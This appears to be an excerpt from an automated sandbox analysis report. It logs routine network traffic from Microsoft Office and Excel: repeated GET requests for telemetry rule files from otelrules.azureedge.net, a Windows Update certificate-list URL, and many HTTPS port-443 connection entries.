Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: unknownNetwork traffic detected: HTTP traffic on port 52609 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52553 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52530 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52633 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52576 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52599 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52610 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52541 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52679 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52518 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52587 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52644 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52529 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 52735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52565 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52517 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52645 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52622 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52588 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52690 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52701
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52708
Source: unknownNetwork traffic detected: HTTP traffic on port 52656 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52706
Source: unknownNetwork traffic detected: HTTP traffic on port 52608 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52700
Source: unknownNetwork traffic detected: HTTP traffic on port 52713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52506 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52554 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52667 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52709
Source: unknownNetwork traffic detected: HTTP traffic on port 52724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52611 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52540 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52643 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52714 -> 443
